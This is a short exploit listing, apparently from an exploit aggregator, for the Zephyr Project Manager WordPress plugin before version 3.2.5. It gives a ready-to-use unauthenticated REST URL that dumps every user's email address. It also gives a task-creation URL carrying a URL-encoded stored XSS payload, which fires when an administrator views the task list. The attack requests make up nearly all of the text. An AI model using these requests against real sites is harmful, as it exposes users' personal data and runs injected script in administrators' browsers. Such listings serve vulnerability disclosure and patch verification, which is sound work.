Exploit for Zephyr Project Manager < 3.2.5 - Unauthorised REST Calls to Stored XSS

Name: Exploit for Zephyr Project Manager < 3.2.5 - Unauthorised REST Calls to Stored XSS
Rating: 5 (205 reviews)

2022-08-29 | CVSS 0.7

## https://sploitus.com/exploit?id=WPEX-ID:BFD8A7AA-5977-4FE5-B2FC-12BF93CAF3ED
Get all users email addresses: http://example.com/wp-json/zephyr_project_manager/v1/users

http://example.com/wp-json/zephyr_project_manager/v1/tasks/create/?name=%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f

The XSS will be trigged when viewing a list where the tasks is displayed, for example All Tasks at /wp-admin/admin.php?page=zephyr_project_manager_tasks